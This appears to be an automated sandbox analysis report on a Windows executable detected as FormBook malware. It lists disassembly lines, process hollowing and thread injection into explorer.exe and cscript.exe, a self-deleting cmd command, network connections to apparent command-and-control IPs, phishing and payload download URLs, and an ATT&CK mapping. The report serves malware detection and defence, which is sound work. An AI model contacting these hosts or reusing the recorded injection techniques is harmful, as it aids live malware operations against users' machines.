Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD821B mov eax, dword ptr fs:[00000030h]	11_2_36AD821B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9D270 mov eax, dword ptr fs:[00000030h]	11_2_36B9D270
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB273 mov eax, dword ptr fs:[00000030h]	11_2_36ADB273
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB273 mov eax, dword ptr fs:[00000030h]	11_2_36ADB273
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB273 mov eax, dword ptr fs:[00000030h]	11_2_36ADB273
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5D250 mov eax, dword ptr fs:[00000030h]	11_2_36B5D250
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5D250 mov ecx, dword ptr fs:[00000030h]	11_2_36B5D250
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA124C mov eax, dword ptr fs:[00000030h]	11_2_36BA124C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA124C mov eax, dword ptr fs:[00000030h]	11_2_36BA124C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA124C mov eax, dword ptr fs:[00000030h]	11_2_36BA124C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA124C mov eax, dword ptr fs:[00000030h]	11_2_36BA124C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F24A mov eax, dword ptr fs:[00000030h]	11_2_36B0F24A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F247 mov eax, dword ptr fs:[00000030h]	11_2_36B9F247
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5C3B0 mov eax, dword ptr fs:[00000030h]	11_2_36B5C3B0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE93A6 mov eax, dword ptr fs:[00000030h]	11_2_36AE93A6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE93A6 mov eax, dword ptr fs:[00000030h]	11_2_36AE93A6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380 mov eax, dword ptr fs:[00000030h]	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380 mov eax, dword ptr fs:[00000030h]	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380 mov eax, dword ptr fs:[00000030h]	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380 mov eax, dword ptr fs:[00000030h]	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380 mov eax, dword ptr fs:[00000030h]	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFF380 mov eax, dword ptr fs:[00000030h]	11_2_36AFF380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F38A mov eax, dword ptr fs:[00000030h]	11_2_36B9F38A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B133D0 mov eax, dword ptr fs:[00000030h]	11_2_36B133D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B143D0 mov ecx, dword ptr fs:[00000030h]	11_2_36B143D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B643D5 mov eax, dword ptr fs:[00000030h]	11_2_36B643D5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE63CB mov eax, dword ptr fs:[00000030h]	11_2_36AE63CB
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADC3C7 mov eax, dword ptr fs:[00000030h]	11_2_36ADC3C7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE3C0 mov eax, dword ptr fs:[00000030h]	11_2_36ADE3C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE3C0 mov eax, dword ptr fs:[00000030h]	11_2_36ADE3C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE3C0 mov eax, dword ptr fs:[00000030h]	11_2_36ADE3C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE328 mov eax, dword ptr fs:[00000030h]	11_2_36ADE328
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE328 mov eax, dword ptr fs:[00000030h]	11_2_36ADE328
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADE328 mov eax, dword ptr fs:[00000030h]	11_2_36ADE328
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB3336 mov eax, dword ptr fs:[00000030h]	11_2_36BB3336
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B18322 mov eax, dword ptr fs:[00000030h]	11_2_36B18322
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B18322 mov eax, dword ptr fs:[00000030h]	11_2_36B18322
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B18322 mov eax, dword ptr fs:[00000030h]	11_2_36B18322
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0332D mov eax, dword ptr fs:[00000030h]	11_2_36B0332D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD9303 mov eax, dword ptr fs:[00000030h]	11_2_36AD9303
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD9303 mov eax, dword ptr fs:[00000030h]	11_2_36AD9303
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1631F mov eax, dword ptr fs:[00000030h]	11_2_36B1631F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9F30A mov eax, dword ptr fs:[00000030h]	11_2_36B9F30A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFE310 mov eax, dword ptr fs:[00000030h]	11_2_36AFE310
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFE310 mov eax, dword ptr fs:[00000030h]	11_2_36AFE310
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFE310 mov eax, dword ptr fs:[00000030h]	11_2_36AFE310
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E372 mov eax, dword ptr fs:[00000030h]	11_2_36B5E372
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E372 mov eax, dword ptr fs:[00000030h]	11_2_36B5E372
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E372 mov eax, dword ptr fs:[00000030h]	11_2_36B5E372
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5E372 mov eax, dword ptr fs:[00000030h]	11_2_36B5E372
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60371 mov eax, dword ptr fs:[00000030h]	11_2_36B60371
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B60371 mov eax, dword ptr fs:[00000030h]	11_2_36B60371
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0237A mov eax, dword ptr fs:[00000030h]	11_2_36B0237A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEB360 mov eax, dword ptr fs:[00000030h]	11_2_36AEB360
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E363 mov eax, dword ptr fs:[00000030h]	11_2_36B1E363
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1A350 mov eax, dword ptr fs:[00000030h]	11_2_36B1A350
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD8347 mov eax, dword ptr fs:[00000030h]	11_2_36AD8347
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD8347 mov eax, dword ptr fs:[00000030h]	11_2_36AD8347
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD8347 mov eax, dword ptr fs:[00000030h]	11_2_36AD8347
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB50B7 mov eax, dword ptr fs:[00000030h]	11_2_36BB50B7
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9B0AF mov eax, dword ptr fs:[00000030h]	11_2_36B9B0AF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B200A5 mov eax, dword ptr fs:[00000030h]	11_2_36B200A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]	11_2_36B8F0A5
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B67090 mov eax, dword ptr fs:[00000030h]	11_2_36B67090
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB4080 mov eax, dword ptr fs:[00000030h]	11_2_36BB4080
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADC090 mov eax, dword ptr fs:[00000030h]	11_2_36ADC090
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADA093 mov ecx, dword ptr fs:[00000030h]	11_2_36ADA093
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1D0F0 mov eax, dword ptr fs:[00000030h]	11_2_36B1D0F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1D0F0 mov ecx, dword ptr fs:[00000030h]	11_2_36B1D0F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD90F8 mov eax, dword ptr fs:[00000030h]	11_2_36AD90F8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD90F8 mov eax, dword ptr fs:[00000030h]	11_2_36AD90F8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD90F8 mov eax, dword ptr fs:[00000030h]	11_2_36AD90F8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD90F8 mov eax, dword ptr fs:[00000030h]	11_2_36AD90F8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B6C0E0 mov ecx, dword ptr fs:[00000030h]	11_2_36B6C0E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADC0F6 mov eax, dword ptr fs:[00000030h]	11_2_36ADC0F6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]	11_2_36ADB0D6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]	11_2_36ADB0D6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]	11_2_36ADB0D6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]	11_2_36ADB0D6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFB0D0 mov eax, dword ptr fs:[00000030h]	11_2_36AFB0D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD02D mov eax, dword ptr fs:[00000030h]	11_2_36ADD02D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22010 mov ecx, dword ptr fs:[00000030h]	11_2_36B22010
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE8009 mov eax, dword ptr fs:[00000030h]	11_2_36AE8009
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B05004 mov eax, dword ptr fs:[00000030h]	11_2_36B05004
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B05004 mov ecx, dword ptr fs:[00000030h]	11_2_36B05004
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE6074 mov eax, dword ptr fs:[00000030h]	11_2_36AE6074
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE6074 mov eax, dword ptr fs:[00000030h]	11_2_36AE6074
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE7072 mov eax, dword ptr fs:[00000030h]	11_2_36AE7072
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB505B mov eax, dword ptr fs:[00000030h]	11_2_36BB505B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B10044 mov eax, dword ptr fs:[00000030h]	11_2_36B10044
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B66040 mov eax, dword ptr fs:[00000030h]	11_2_36B66040
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1051 mov eax, dword ptr fs:[00000030h]	11_2_36AE1051
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1051 mov eax, dword ptr fs:[00000030h]	11_2_36AE1051
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B141BB mov ecx, dword ptr fs:[00000030h]	11_2_36B141BB
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B141BB mov eax, dword ptr fs:[00000030h]	11_2_36B141BB
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B141BB mov eax, dword ptr fs:[00000030h]	11_2_36B141BB
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB51B6 mov eax, dword ptr fs:[00000030h]	11_2_36BB51B6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E1A4 mov eax, dword ptr fs:[00000030h]	11_2_36B1E1A4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E1A4 mov eax, dword ptr fs:[00000030h]	11_2_36B1E1A4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21190 mov eax, dword ptr fs:[00000030h]	11_2_36B21190
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B21190 mov eax, dword ptr fs:[00000030h]	11_2_36B21190
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B09194 mov eax, dword ptr fs:[00000030h]	11_2_36B09194
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE4180 mov eax, dword ptr fs:[00000030h]	11_2_36AE4180
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE4180 mov eax, dword ptr fs:[00000030h]	11_2_36AE4180
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE4180 mov eax, dword ptr fs:[00000030h]	11_2_36AE4180
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F1F0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F1F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0F1F0 mov eax, dword ptr fs:[00000030h]	11_2_36B0F1F0

Source: C:\Windows\SysWOW64\cscript.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,

6_2_00401E43

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 35.208.230.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.251.235.194 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.102 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.169.142.0 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.140.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.70.184.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.115.19.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.158.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.246.142.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.124.149.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 6A0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Thread register set: target process: 5528			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 5528			Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process created: C:\Users\user\Desktop\hi38VYWujz.exe C:\Users\user\Desktop\hi38VYWujz.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hi38VYWujz.exe"			Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

6_2_00403350

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	221 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Windows Service	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	511 Process Injection	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	511 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hi38VYWujz.exe	58%	Virustotal		Browse
hi38VYWujz.exe	50%	ReversingLabs	Win32.Trojan.Leonem

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
www.crossdressersespana.com	1%	Virustotal		Browse
www.embhajeflexiveis.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.icolut.xyz/be53/?oT5=s1julRGmed5yUPqy1/u/CkIYofLXefI1rcsRJX7fFh3jFZdFBAK63iIEYWpG9dFdYT7A&v0Dd=aPFdKLwPWjPXZR-p	100%	Avira URL Cloud	phishing
http://www.1wisas.top/be53/?oT5=h5pbAFevEiRk+Avdv7HqEwAnW0lU2xxIsSfcH8MPtJpxQdX8NQy8CxMG+zlahwfzy/4y&v0Dd=aPFdKLwPWjPXZR-p	100%	Avira URL Cloud	phishing
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin	100%	Avira URL Cloud	malware
http://www.enjoythearoma.com/be53/?oT5=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://www.fetch-a-estudia-y-trabaja.info/be53/?oT5=yK7OrObBKTGz0pPpQHDZ1Ug64ujsVcJjhTRwQrEw26qJt5FpmjfB1P4zEa5Vqv0dsIGr&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://www.arctiquevarare.com/be53/?oT5=INULBbnUeQ+YoPWvOon16eoyazYMd+BlZq05NDhrWdwyda5UeJingftxUrbq982m+Gct&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://www.embhajeflexiveis.com/be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binO	100%	Avira URL Cloud	malware
http://www.2004256.com/be53/?oT5=AooPDu4QOB27lZfkSgAw9MoUMoboYKOvBuVKrBFHr89pQNaRTMdrm8d0/nwlB7CJGzGJ&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
http://www.freightbyu.com/be53/?oT5=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT&v0Dd=aPFdKLwPWjPXZR-p	0%	Avira URL Cloud	safe
